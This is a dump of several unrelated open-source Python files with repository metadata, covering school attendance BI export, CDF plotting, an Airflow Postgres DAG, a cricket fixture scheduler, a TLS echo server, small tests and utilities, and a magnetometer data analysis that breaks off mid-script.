\n nAssistencies = 1 if element.estat is not None and element.estat.codi_estat in ( 'P','R','O') else 0\n element_row.append( nAssistencies )\n \n nFaltesTotes = 1 if element.estat is not None and element.estat.codi_estat in ( 'F','J') else 0\n element_row.append( nFaltesTotes )\n \n nFaltesNoJustificades = 1 if element.estat is not None and element.estat.codi_estat in ( 'F') else 0\n element_row.append( nFaltesNoJustificades )\n \n nFaltesJustificades = 1 if element.estat is not None and element.estat.codi_estat in ( 'J') else 0\n element_row.append( nFaltesJustificades )\n \n nRetards = 1 if element.estat is not None and element.estat.codi_estat in ( 'R') else 0\n element_row.append( nRetards )\n\n writer.writerow( element_row ) \n \n ofile.close()\n \n\n\n#-------------------------------------------- DADES per al Em sento afortunat ---------------------------------------\ndef fact_controls_dissociats( n=-1 ): \n debug = n\n file_name = os.path.join( settings.BI_DIR, 'controls_dissociats.csv')\n ofile = open(file_name, 'wb')\n writer = csv.writer(ofile)\n \n element_row = []\n \n columnes = [ \n 'nom_nivell' ,\n 'hora_inici' ,\n 'assistenciaMateixaHora1WeekBefore' ,\n 'assistenciaMateixaHora2WeekBefore' ,\n 'assistenciaMateixaHora3WeekBefore' ,\n 'assistenciaaHoraAnterior' ,\n 'assistencia' ]\n for c in columnes:\n element_row.append( c )\n writer.writerow( element_row ) \n \n pks = ( ControlAssistencia\n .objects\n .exclude( alumne__data_baixa__isnull = False )\n .filter(\n impartir__dia_impartir__lt = datetime.today(),\n impartir__dia_impartir__gt = date( year = 2012, month = 10, day = 1 ) \n )\n .values_list('id', flat=True)\n .order_by( 'impartir__dia_impartir' )\n )\n \n for pk in pks:\n element = ControlAssistencia.objects.get( pk = pk )\n debug -= 1\n if debug == 0:\n break\n\n row = []\n \n dades = dades_dissociades(element) \n for c in columnes:\n row.append( dades[c] )\n writer.writerow( row ) \n \n ofile.close()\n \ndef dades_dissociades( element ):\n\n element_dict = {}\n \n element_dict['nom_nivell'] = element.alumne.grup.curs.nivell.nom_nivell \n \n element_dict['hora_inici'] = element.impartir.horari.hora.hora_inici \n \n #setmanes anteriors\n fa1Setmana = element.impartir.dia_impartir - t.timedelta( days = 7 )\n fa2Setmana = element.impartir.dia_impartir - t.timedelta( days = 14 )\n fa3Setmana = element.impartir.dia_impartir - t.timedelta( days = 21 )\n \n try:\n elementfa1Setmana = ControlAssistencia.objects.filter( \n alumne = element.alumne,\n impartir__horari__hora = element.impartir.horari.hora, \n impartir__dia_impartir = fa1Setmana, \n impartir__horari__assignatura = element.impartir.horari.assignatura )\n except ControlAssistencia.DoesNotExist:\n elementfa1Setmana = None\n esFaltaMateixaHora1WeekBefore = PresenciaQuerySet( elementfa1Setmana )\n\n try:\n elementfa2Setmana = ControlAssistencia.objects.filter( \n alumne = element.alumne, \n impartir__horari__hora = element.impartir.horari.hora, \n impartir__dia_impartir = fa2Setmana, \n impartir__horari__assignatura = element.impartir.horari.assignatura )\n except ControlAssistencia.DoesNotExist:\n elementfa2Setmana = None\n esFaltaMateixaHora2WeekBefore = PresenciaQuerySet( elementfa2Setmana )\n\n try:\n elementfa3Setmana = ControlAssistencia.objects.filter( \n alumne = element.alumne, \n impartir__horari__hora = element.impartir.horari.hora, \n impartir__dia_impartir = fa3Setmana, \n impartir__horari__assignatura = element.impartir.horari.assignatura )\n except ControlAssistencia.DoesNotExist:\n elementfa3Setmana = None\n esFaltaMateixaHora3WeekBefore = PresenciaQuerySet( elementfa3Setmana )\n\n element_dict['assistenciaMateixaHora1WeekBefore'] = esFaltaMateixaHora1WeekBefore \n element_dict['assistenciaMateixaHora2WeekBefore'] = esFaltaMateixaHora2WeekBefore \n element_dict['assistenciaMateixaHora3WeekBefore'] = esFaltaMateixaHora3WeekBefore \n\n #---Una hora abans \n unaHora40abans = add_secs_to_time(element.impartir.horari.hora.hora_inici, -100*60)\n\n controls_anteriors = ControlAssistencia.objects.filter(\n alumne = element.alumne, \n impartir__horari__hora__hora_inici__lt = element.impartir.horari.hora.hora_inici,\n impartir__horari__hora__hora_inici__gt = unaHora40abans,\n impartir__dia_impartir = element.impartir.dia_impartir ) \n \n\n \n esFaltaHoraAnterior = PresenciaQuerySet( controls_anteriors )\n \n element_dict['assistenciaaHoraAnterior'] = esFaltaHoraAnterior \n\n esFalta = CalculaFalta( element )\n \n element_dict['assistencia'] = esFalta \n \n return element_dict\n \ndef CalculaFalta( element ):\n\n if element and element.estat is not None:\n if element.estat.codi_estat in ( 'P','R','O'):\n esFalta = 'Present' \n else:\n esFalta = 'Absent'\n else:\n esFalta = 'NA'\n \n return esFalta\n\ndef PresenciaQuerySet( qs ):\n if qs is not None and qs.filter( estat__isnull = False ).exists():\n if qs.filter( estat__codi_estat__in = ['P','R'] ):\n esFaltaAnterior = 'Present'\n elif qs.filter( estat__codi_estat__in = ['O'] ):\n esFaltaAnterior = 'Online'\n else:\n esFaltaAnterior = 'Absent'\n else:\n esFaltaAnterior = 'NA'\n return esFaltaAnterior\n\n\n#------------\n\ndef any_inici_curs():\n return Curs.objects.filter( data_inici_curs__isnull = False )[0].data_inici_curs.year\n\n \ndef add_secs_to_time(timeval, secs_to_add):\n import datetime\n dummy_date = datetime.date(1, 1, 1)\n full_datetime = datetime.datetime.combine(dummy_date, timeval)\n added_datetime = full_datetime + datetime.timedelta(seconds=secs_to_add)\n return added_datetime.time() \n \n ","repo_name":"ctrl-alt-d/django-aula","sub_path":"aula/apps/BI/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16002,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"2"} +{"seq_id":"14389418320","text":"import json\nimport sys\nfrom itertools import cycle\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# noinspection SpellCheckingInspection\nEXAMPLE_CTRL_JSON = \"\"\"######### EXAMPLE JSON: #########\n{\n \"title\": \"cdf figure\", \n \"x_label\": \"VAR X\", \n \"y_label\": \"\", \n \"save_path\": \"./cdf.pdf\", \n \"show_figure\": false, \n \"data\": [\n {\n \"legend\": \"Baseline\", \n \"csv_path\": \"./similarity_score.csv\", \n \"col_name\": \"baseline\", \n \"sample_range\": [0, 1.002, 0.001], \n \"count_out_of_range_data\": true,\n \"out_of_range_data_as\": 0,\n }, \n {\n \"legend\": \"Tor\", \n \"csv_path\": \"./similarity_score.csv\", \n \"col_name\": \"torsocks\", \n \"sample_range\": [0, 1.002, 0.001], \n \"count_out_of_range_data\": true,\n \"out_of_range_data_as\": 0,\n }\n ]\n}\n\"\"\"\n\n\n# noinspection SpellCheckingInspection\ndef set_plot_options():\n options = {\n # 'backend': 'PDF',\n 'font.size': 14,\n 'figure.figsize': (4, 2.67),\n 'figure.dpi': 100.0,\n 'figure.subplot.left': 0.20,\n 'figure.subplot.right': 0.97,\n 'figure.subplot.bottom': 0.20,\n 'figure.subplot.top': 0.90,\n 'grid.color': '0.1',\n 'grid.linestyle': ':',\n # 'grid.linewidth': 0.5,\n 'axes.grid': True,\n # 'axes.grid.axis' : 'y',\n # 'axes.axisbelow': True,\n 'axes.titlesize': 'x-small',\n 'axes.labelsize': 'small',\n 'axes.formatter.limits': (-4, 4),\n 'xtick.labelsize': 10,\n 'ytick.labelsize': 10,\n 'lines.linewidth': 2.0,\n 'lines.markeredgewidth': 0.5,\n 'lines.markersize': 4,\n 'legend.fontsize': 9,\n 'legend.fancybox': False,\n 'legend.shadow': False,\n 'legend.borderaxespad': 0.5,\n 'legend.numpoints': 1,\n 'legend.handletextpad': 0.5,\n 'legend.handlelength': 2.0,\n 'legend.labelspacing': .25,\n 'legend.markerscale': 1.0,\n # turn on the following to embedd fonts; requires latex\n 'ps.useafm': True,\n 'pdf.use14corefonts': True,\n 'text.usetex': True,\n }\n for option_key in options:\n matplotlib.rcParams[option_key] = options[option_key]\n if 'figure.max_num_figures' in matplotlib.rcParams:\n matplotlib.rcParams['figure.max_num_figures'] = 50\n if 'figure.max_open_warning' in matplotlib.rcParams:\n matplotlib.rcParams['figure.max_open_warning'] = 50\n if 'legend.ncol' in matplotlib.rcParams:\n matplotlib.rcParams['legend.ncol'] = 50\n\n\ndef data_prepare(df_path, col_name, sample_range, count_out_of_range_data=False, out_of_range_data_as=None):\n \"\"\"\n sample_range = [start, end, interval], start can be left, end can be right if all data are included.\n count_out_of_range_data = True if out of range data are counted in Denominator\n \"\"\"\n df = pd.read_csv(df_path)\n df = df[col_name]\n ori_len = len(df)\n if out_of_range_data_as is not None:\n df = df.fillna(float(out_of_range_data_as))\n df = df[df >= sample_range[0]] if sample_range[0] != 'left' else df\n df = df[df <= sample_range[1]] if sample_range[0] != 'right' else df\n new_len = len(df)\n total_len = ori_len if count_out_of_range_data else new_len\n res = []\n threshold = sample_range[0]\n while threshold <= sample_range[1]:\n num_target = len(df[df <= threshold])\n res.append({\"var\": threshold, \"cd\": num_target / total_len})\n threshold += sample_range[2]\n return res\n\n\ndef parse_cmd(json_path):\n with open(json_path, 'r') as f:\n commands = json.load(f)\n data_list = []\n legend_list = []\n for data_single in commands['data']:\n print(data_single)\n if \"out_of_range_data_as\" in data_single:\n out_of_range_data_as = data_single['out_of_range_data_as']\n else:\n out_of_range_data_as = None\n dl = data_prepare(data_single['csv_path'],data_single['col_name'],data_single['sample_range'], \n count_out_of_range_data=data_single['count_out_of_range_data'], out_of_range_data_as=out_of_range_data_as)\n data_list.append(dl)\n legend_list.append(data_single['legend'])\n cdf_plot(data_list, legend_list, commands['title'], commands['save_path'], xlabel=commands['x_label'],\n ylabel=commands['y_label'],\n show_figure=commands['show_figure'])\n\n\n# noinspection SpellCheckingInspection,PyUnusedLocal\ndef cdf_plot(res_data_list, legend_list, title, save_path, xlabel=\"\", ylabel=\"\", show_figure=True):\n # Fixing random state for reproducibility\n set_plot_options()\n lines = [\"-\", \"--\", \"-.\", \":\"]\n linecycler = cycle(lines)\n var_num = len(res_data_list)\n plot_idx = 0\n for res in res_data_list:\n plot_idx += 1\n x_direct = []\n y_direct = []\n for r in res:\n x_direct.append(r['var'])\n y_direct.append(r['cd'])\n exec(\"p%d= plt.plot(x_direct, y_direct,linestyle=next(linecycler))\" % plot_idx)\n if len(xlabel) > 0:\n plt.xlabel(xlabel)\n if len(ylabel) > 0:\n plt.ylabel(ylabel)\n if len(title) > 0:\n plt.title(title)\n add_legend = \"plt.legend((\"\n for i in range(1, var_num):\n add_legend += \"p%d[0], \" % i\n add_legend += \"p%d[0]), (\" % var_num\n add_legend += str(legend_list).strip('[]')\n add_legend += \"))\"\n print(add_legend)\n exec(add_legend)\n axes = plt.gca()\n # axes.set_xlim([xmin,xmax])\n axes.set_ylim([0, 1])\n plt.savefig(save_path)\n if show_figure:\n plt.show()\n\n\ndef generate_example_json():\n print(EXAMPLE_CTRL_JSON)\n\n\ndef main():\n if len(sys.argv) != 2:\n print(\"Usage: cdf_plot path/to/conf.json\")\n exit()\n if sys.argv[1] == '-g':\n generate_example_json()\n else:\n parse_cmd(sys.argv[1])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zz090923610/gpef","sub_path":"gpef/graphic/cdf_plot.py","file_name":"cdf_plot.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41431436957","text":"import uuid\nimport logging\nfrom datetime import datetime\nfrom airflow import DAG\nfrom airflow.operators.python import PythonOperator\nfrom airflow.operators.dummy import DummyOperator\nfrom airflow.operators.python_operator import BranchPythonOperator\nfrom airflow.operators.bash import BashOperator\nfrom airflow.models.xcom import XCom\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.operators.postgres_operator import PostgresOperator\nfrom airflow.utils.trigger_rule import TriggerRule\nfrom custom_operator.postgres_operator import PostgreSQLCountRows\n\n\nconfig = {\n 'dag_id_1': {'schedule_interval': None, \n 'start_date': datetime(2022, 11, 11),\n 'table_name': 'table_name_1'}, \n 'dag_id_2': {'schedule_interval': None, \n 'start_date': datetime(2018, 11, 11),\n 'table_name': 'table_name_2'}, \n 'dag_id_3':{'schedule_interval': None, # changed from '@daily'\n 'start_date': datetime(2018, 11, 11),\n 'table_name': 'table_name_3'}\n }\n\n# branching function\ndef check_table_exist(sql_to_check_table_exist, table_name):\n \"\"\" callable function to get schema name and after that check if table exist \"\"\" \n hook = PostgresHook()\n schema = 'public'\n\n # check table exist\n query = hook.get_first(sql=sql_to_check_table_exist.format(schema, table_name))\n print(query)\n\n if query:\n return 'insert_row'\n else:\n logging.info(f\"table {table_name} does not exist\")\n return 'create_table' \n\ndef log_information(dag_id, database):\n logging.info(f'{dag_id} start processing tables in database: {database}')\n\nfor id, dict in config.items():\n with DAG(id, start_date=dict['start_date'], schedule_interval=dict['schedule_interval']) as dag:\n start = PythonOperator(\n task_id='print_process_start',\n python_callable=log_information,\n op_kwargs={'dag_id': id, 'database': 'public'},\n queue='queue_capstone'\n )\n\n get_user = BashOperator(\n task_id=\"get_current_user\",\n bash_command=\"whoami\",\n queue='queue_capstone'\n )\n\n table_name = \"table_name\"\n check = BranchPythonOperator(task_id='check_table_exists',\n python_callable=check_table_exist,\n op_args=[\"SELECT * FROM information_schema.tables \"\n \"WHERE table_schema = '{}'\"\n \"AND table_name = '{}';\", table_name],\n queue='queue_capstone')\n \n sql_create_table = '''CREATE TABLE table_name(custom_id integer NOT NULL, \n user_name VARCHAR (50) NOT NULL, timestamp TIMESTAMP NOT NULL);'''\n create = PostgresOperator(task_id='create_table',\n postgres_conn_id='postgres_default',\n sql=sql_create_table,\n queue='queue_capstone')\n\n custom_id_value = uuid.uuid4().int % 123456789\n timestamp_value = datetime.now()\n insert = PostgresOperator(task_id='insert_row',\n postgres_conn_id='postgres_default',\n sql='''INSERT INTO table_name VALUES(%s, '{{ ti.xcom_pull(task_ids='get_current_user', key='return_value') }}', %s);''',\n parameters=(custom_id_value, timestamp_value),\n trigger_rule='all_done',\n queue='queue_capstone')\n\n query = PostgreSQLCountRows(task_id='query_table',\n postgres_conn_id='postgres_default',\n table_name='table_name',\n queue='queue_capstone')\n\n start >> get_user\n get_user >> check \n check >> [create, insert]\n create >> insert\n insert >> query","repo_name":"karenbocardo/airflow","sub_path":"dags/jobs_dag.py","file_name":"jobs_dag.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4695729029","text":"import itertools\nfrom datetime import datetime,timedelta\n\nprint(\"IPL Schedule 2023\")\n\n\ndef schedule_matches(teams, start_date):\n num_teams = len(teams)\n num_rounds = (num_teams - 1)\n\n fixtures = []\n match_date = start_date.replace(hour=14, minute=30)\n \n for round_num in range(num_rounds):\n round_fixtures = []\n for i in range(num_teams // 2):\n home = teams[i]\n away = teams[num_teams - 1 -i]\n round_fixtures.append((home, away , match_date))\n match_date += timedelta(hours = 5) # Increase time by 5 hours \n match_date += timedelta(days = 1)\n # Move to the next day\n \n \n \n \n fixtures.append(round_fixtures)\n teams.insert(1, teams.pop())\n\n \n \n return fixtures\n\n# Fix the code to play one match at 2:30 PM and the next match at 7:30 PM on each day\ndef fix_schedule(fixtures):\n for round_num, round_fixtures in enumerate(fixtures):\n day_counter = 0\n for i in range(0, len(round_fixtures), 2):\n first_match = round_fixtures[i]\n second_match = round_fixtures[i + 1]\n\n # Play the first match at 2:30 PM\n first_match_date = first_match[2] + timedelta(days=day_counter, hours=2, minutes=30)\n\n # Play the second match at 7:30 PM\n second_match_date = first_match[2] + timedelta(days=day_counter, hours=7, minutes=30)\n\n round_fixtures[i] = (first_match[0], first_match[1], first_match_date)\n round_fixtures[i + 1] = (second_match[0], second_match[1], second_match_date)\n\n day_counter += 1\n\n return fixtures\n\n# Example usage\nteam_names = ['Royal Challengers Bangalore' , 'Chennai Super Kings' , 'Kolkata Knight Riders' , 'Delhi Capitals' , 'Mumbai Indians' , 'Gujarat Titans' , 'Lucknow Super Giants','Punjab Kings','Rajasthan Royals','Sunrisers Hyderabad']\nstart_date = datetime(2023, 6, 20) #Specify the start date\nfixtures = schedule_matches(team_names, start_date)\n\n# Fix the Schedule\nfixtures = fix_schedule(fixtures)\n\n#Display the fixtures\nmatch_num = 0\nfor round_num, round_fixtures in enumerate(fixtures):\n print()\n print(f\"Round {round_num + 1} Fixtures:\")\n print()\n \n for match in round_fixtures:\n \n home, away , match_date = match\n \n print(f\"Match { match_num + 1}: -- Date : {match_date} -- {home} (Home) vs {away} (Away) \")\n match_num +=1\n \nmatch_num = 45\nfor round_num, round_fixtures in enumerate(fixtures):\n print()\n print(f\"Round {round_num + 10} Fixtures:\")\n print()\n \n for match in round_fixtures:\n \n away, home , match_date = match\n \n print(f\"Match { match_num + 1}: -- Date : {match_date} -- {home} (Home) vs {away} (Away) \")\n match_num +=1\n\nprint()\nprint (\"--- Knockout Stage ---\")\nprint()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"sohan2311/sohanmaity","sub_path":"Documents/Developer/Google_Coursera/Python for Beginers/Nested Loops/TeamAdvanced.py","file_name":"TeamAdvanced.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29444436495","text":"#tls-server-hello\nimport os\nimport socket, sys, ssl\n\nSERVER_HOST = ''\nTLS_HELLOSERVER_PORT = 54221\nBACKLOG = 5\n\nservercontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\n\nservercontext.load_cert_chain(certfile='/home/kai/local-ca/ca.crt',\n keyfile='/home/kai/local-ca/ca.key')\n\nprint('Server: PID', os.getpid())\nserv_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserv_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserv_sock.bind((SERVER_HOST, TLS_HELLOSERVER_PORT))\n\nserv_sock.listen(BACKLOG)\nprint('Server waiting for a connection request ...')\n\nwhile True:\n cli_sock, cli_addr = serv_sock.accept()\n sslsock = servercontext.wrap_socket(cli_sock, server_side=True)\n try:\n print('Connected by', cli_addr)\n msg = sslsock.recv(1024) #receive greetings message\n print('Received:', msg.decode('utf-8'))\n if msg:\n welcome = 'Hi client, Welcome to Hello Server, Bye!!'\n welcome = welcome.encode('utf-8')\n sslsock.send(welcome)\n print('Sent welcome message to client', cli_addr[0])\n else:\n print('No data from', cli_addr[0])\n continue\n finally:\n sslsock.close()\n","repo_name":"khairul006/network-programming-skr3303","sub_path":"tls-server-hello.py","file_name":"tls-server-hello.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29937911616","text":"from http import HTTPStatus\nimport requests\n\n\ndef test():\n test_result = 'Pass'\n\n\n\n # Reinitialize Restaurant service\n http_response = requests.post(\"http://localhost:8080/reInitialize\")\n\n if(http_response.status_code != HTTPStatus.CREATED):\n test_result = 'Fail 1'\n\n # Reinitialize Delivery service\n http_response = requests.post(\"http://localhost:8081/reInitialize\")\n\n if(http_response.status_code != HTTPStatus.CREATED):\n test_result = 'Fail 2'\n\n http_response = requests.post(\"http://localhost:8082/reInitialize\")\n\n if(http_response.status_code != HTTPStatus.CREATED):\n test_result = 'Fail 3'\n\n http_response = requests.get(\"http://localhost:8082/balance/301\")\n if (http_response.status_code != HTTPStatus.OK):\n test_result = 'Fail 4'\n\n res_body = http_response.json()\n cust_id = res_body.get(\"custId\")\n cust_balance = res_body.get(\"balance\")\n if (cust_id != 301):\n test_result = 'Fail 5'\n\n if(cust_balance != 2000.0):\n test_result = 'Fail 6'\n\n return test_result\n\n\nif __name__ == \"__main__\":\n test_result = test()\n print(test_result)\n","repo_name":"akash896/FoodDeliveryProject","sub_path":"Spring/Phase2 without DB Service/Tests/copy/Public5-Project1Phase1.py","file_name":"Public5-Project1Phase1.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28562657006","text":"#!/usr/bin/python3\n\"\"\"create a class student and retrieve the dictionnary\"\"\"\n\n\nclass Student:\n \"\"\"creation of the class\"\"\"\n\n def __init__(self, first_name, last_name, age):\n \"\"\"instanciation of a student\"\"\"\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n\n def to_json(self, attrs=None):\n \"\"\"retrieves a dictionary representation of a Student instance\n Args:\n attrs (list): list of strings\n Return: a dictionnary\n \"\"\"\n if type(attrs) == list:\n check = 0\n for at in attrs:\n if type(at) != str:\n check = 1\n if check == 0:\n return {att: getattr(self, att)\n for att in attrs if hasattr(self, att)}\n return self.__dict__\n","repo_name":"solaure2tt/alx-higher_level_programming","sub_path":"0x0B-python-input_output/10-student.py","file_name":"10-student.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41581199836","text":"\"\"\"A circular world environment.\"\"\"\nimport numpy\n\nfrom deep_learning.engine import base\n\nSTEP_LIMIT = 500\n\n\nclass CircularWorld(base.Environment):\n \"\"\"A circular world consists of integers between -n and n.\n\n Possible actions are go left (0), right (2), or stay (1). Going left from -n\n ends with n, and going right from n ends with -n. Any action getting closer\n to 0 is given +1 reward, with getting away given -1 reward and not moving\n with 0 reward.\n \"\"\"\n\n def __init__(self, size: int = 5):\n \"\"\"Constructor.\n\n Args:\n size: the integers between +/- size are used.\n \"\"\"\n super().__init__(state_shape=(1,), action_space_size=3)\n self._size = size\n\n self._current_state = None\n self._num_actions_taken = None\n self.Reset()\n\n def Reset(self) -> base.State:\n self._current_state = 0\n self._num_actions_taken = 0\n return numpy.array([[self._current_state]])\n\n def TakeAction(self, action: base.Action) -> base.Transition:\n current_state = self._current_state\n move = self.GetChoiceFromAction(action) - 1 # -1, 0, 1\n new_state = current_state + move\n\n r = None\n if move == 0:\n r = 0\n else:\n if move == 1 and current_state < 0:\n r = 1\n elif move == -1 and current_state > 0:\n r = 1\n else:\n r = -1\n\n if new_state > self._size:\n new_state = -self._size\n elif new_state < -self._size:\n new_state = self._size\n\n s = numpy.array([[current_state]])\n a = action\n if self._num_actions_taken >= STEP_LIMIT:\n sp = None\n else:\n sp = numpy.array([[new_state]])\n\n self._current_state = new_state\n self._num_actions_taken += 1\n\n return base.Transition(s, a, r, sp)\n\n def GetAllStates(self):\n return numpy.vstack(\n [numpy.array([s]) for s in range(-self._size, self._size + 1)])\n","repo_name":"ChihChiu29/deep_learning","sub_path":"examples/circular_world_env.py","file_name":"circular_world_env.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"1794886826","text":"import pandas as pd\nimport csv\n\n\nclass InputParser:\n\n @staticmethod\n def parse_input_zoo_data(filename, header='infer'):\n\n input_data = pd.read_csv(filename, header=header)\n\n classes = input_data[17].tolist()\n labels = input_data[0].tolist()\n\n del input_data[0]\n del input_data[17]\n\n input_database = {0: input_data.values}\n\n return input_database, labels, classes\n\n @staticmethod\n def output_list(data_list, filename):\n\n with open(filename, 'w') as f:\n wr = csv.writer(f, lineterminator='\\n')\n wr.writerow(data_list)\n","repo_name":"razmik/htgsom","sub_path":"util/input_parser.py","file_name":"input_parser.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"71427053485","text":"\"\"\"utils for the release process.\"\"\"\n\nimport sys\nimport subprocess\nfrom marian.version import __version__\n\ndef run(cmd):\n return subprocess.getoutput(cmd)\n\ndef update_version(version_file_path, version_str):\n \"\"\"update the version file.\"\"\"\n\n prefixed_warning = \"\"\"\\\"\\\"\\\"!!!AUTOMATICALLY GENERATED!!! DO NOT EDIT.\nsee marian/release.py.\\\"\\\"\\\"\\n\"\"\"\n\n version_doc = f'{prefixed_warning}__version__ = \"{version_str}\"\\n'\n\n with open(version_file_path, 'w') as f:\n f.write(version_doc)\n f.close()\n\ndef version_error():\n \"\"\"print that invalid semver was supplied and exit with error code 1.\"\"\"\n\n print('must supply version argument like \"0.0.10\".')\n print('exiting...')\n sys.exit(1)\n\ndef update_version_and_tag_for_release():\n \"\"\"\n full process. utilized by root release script.\n\n if master branch:\n 1. bump version\n 2. commit\n 3. tag\n 4. push both\n\n otherwise, just commit the bumped version.\n \"\"\"\n\n print(f'current version is {__version__}.')\n\n if len(sys.argv) > 1:\n new_version = sys.argv[1]\n else:\n try:\n new_version = input(\n '''what do you want the new version to be?\nenter new version: '''\n )\n except (KeyboardInterrupt, EOFError):\n print('\\nexiting...')\n sys.exit(0)\n\n if new_version == '' or new_version.count('.') != 2 or len(new_version) < 5:\n version_error()\n\n update_version(f'marian/version.py', new_version)\n\n print(f'version updated to {new_version}.')\n\n run('git add -A')\n run(f'git commit -m \"release v{new_version}\"')\n\n current_branch = run('git symbolic-ref --short HEAD')\n print(f'\\nOn {current_branch} branch...')\n if current_branch == 'master':\n # must use annotated tags if using --follow-tags\n run(f'git tag -a {new_version} -m \"v{new_version}\"')\n run('git push --follow-tags')\n print('tags and commits pushed.\\n')\n print(f'''after CI runs at https://travis-ci.org/nebulousdog/marian,\nfind new releases at all the following locations:\n* Github Releases: https://github.com/nebulousdog/marian/releases\n* PyPI: https://pypi.org/project/marian/\n* Github Pages: https://nebulousdog.github.io/marian/\n''')\n else:\n print('Quick releases are only performed on the master branch.')\n","repo_name":"dreamalligator/marian","sub_path":"marian/utils/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"69902134446","text":"from glob import glob\nimport re\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pylab as pl\n\nimport utilities\n\nif __name__ == '__main__':\n folders = glob(\"R*/\")\n\n print(folders)\n axis_list = []\n current_x_list = []\n current_y_list = []\n current_z_list = []\n Bx_coil_list = []\n By_coil_list = []\n Bz_coil_list = []\n B_coil_list = []\n Bx_list = []\n By_list = []\n Bz_list = []\n B_list = []\n Bx_std_list = []\n By_std_list = []\n Bz_std_list = []\n B_std_list = []\n for folder in folders:\n folder_split = re.split('R1|RQ1|_', folder)\n print(folder_split)\n # print(float(folder_split[4][:-1]))\n\n rotation_axis = folder_split[1]\n if rotation_axis == '':\n rotation_axis = 'z'\n\n current_x = float(folder_split[2])\n current_y = float(folder_split[3])\n current_z = float(folder_split[4][:-1])\n current = np.array([current_x, current_y, current_z])\n\n Bx_coil, By_coil, Bz_coil = utilities.amper2gauss_array(current_x, current_y, current_z)\n B_coil = np.linalg.norm([Bx_coil, By_coil, Bz_coil])\n\n\n print(rotation_axis, current)\n\n log_files = glob(f'{folder[:-1]}/*8.log')\n\n log_summary_files = glob(f'{folder[:-1]}/*summary.log')\n\n if len(log_files) == 1:\n log_file = log_files[0]\n print(log_file)\n log_summary_file = log_summary_files[0]\n\n B_dataframe = pd.read_csv(log_file, names=['Bx', 'By', 'Bz', 'B'], delimiter='\\t')\n # print(B_dataframe)\n\n Bx_mean = B_dataframe['Bx'].mean()\n By_mean = B_dataframe['By'].mean()\n Bz_mean = B_dataframe['Bz'].mean()\n B_mean = B_dataframe['B'].mean()\n\n\n\n Bx_std = np.std(B_dataframe['Bx']) / np.sqrt(len(B_dataframe['Bx']) - 1)\n By_std = np.std(B_dataframe['By']) / np.sqrt(len(B_dataframe['By']) - 1)\n Bz_std = np.std(B_dataframe['Bz']) / np.sqrt(len(B_dataframe['Bz']) - 1)\n B_std = np.std(B_dataframe['B']) / np.sqrt(len(B_dataframe['B']) - 1)\n\n print(f'B = {B_mean:.2f}, std = {B_std:.2f}, rB = {np.abs(B_std / B_mean) * 100:.2f} %')\n print(f'Bx = {Bx_mean:.2f}, std = {Bx_std:.2f}, rBx = {np.abs(Bx_std / Bx_mean) * 100:.2f} %')\n print(f'B = {By_mean:.2f}, std = {By_std:.2f}, rBy = {np.abs(By_std / By_mean) * 100:.2f} %')\n print(f'B = {Bz_mean:.2f}, std = {Bz_std:.2f}, rBz = {np.abs(Bz_std / Bz_mean) * 100:.2f} %')\n\n f = open(log_summary_file, 'r')\n summary = f.read()\n f.close()\n\n print(summary)\n\n if len(B_dataframe) > 5:\n axis_list.append(rotation_axis)\n current_x_list.append(current_x)\n current_y_list.append(current_y)\n current_z_list.append(current_z)\n Bx_coil_list.append(Bx_coil)\n By_coil_list.append(By_coil)\n Bz_coil_list.append(Bz_coil)\n B_coil_list.append(B_coil)\n B_list.append(B_mean)\n Bx_list.append(Bx_mean)\n By_list.append(By_mean)\n Bz_list.append(Bz_mean)\n B_std_list.append(B_std)\n Bx_std_list.append(Bx_std)\n By_std_list.append(By_std)\n Bz_std_list.append(Bz_std)\n\n data = {'axis': axis_list,\n 'current_x': current_x_list,\n 'current_y': current_y_list,\n 'current_z': current_z_list,\n 'Bx_coil' : Bx_coil_list,\n 'By_coil': By_coil_list,\n 'Bz_coil': Bz_coil_list,\n 'B_coil': B_coil_list,\n 'Bx_measured': Bx_list,\n 'By_measured': By_list,\n 'Bz_measured': Bz_list,\n 'B_measured': B_list,\n 'Bx_measured_std': Bx_std_list,\n 'By_measured_std': By_std_list,\n 'Bz_measured_std': Bz_std_list,\n 'B_measured_std': B_std_list}\n\n dataframe = pd.DataFrame(data)\n # print(dataframe)\n\n # rotate around x axis\n print('rotate around x axis')\n dataframe_x = dataframe[dataframe['axis'] == 'x']\n # print(dataframe_x)\n\n fig1 = plt.figure('x-axis')\n # plt.scatter(dataframe_x['current_y'], dataframe_x['current_z'])\n\n plt.title('Rotate around x axis')\n plt.scatter(dataframe_x['By_measured'], dataframe_x['Bz_measured'], label='measured')\n 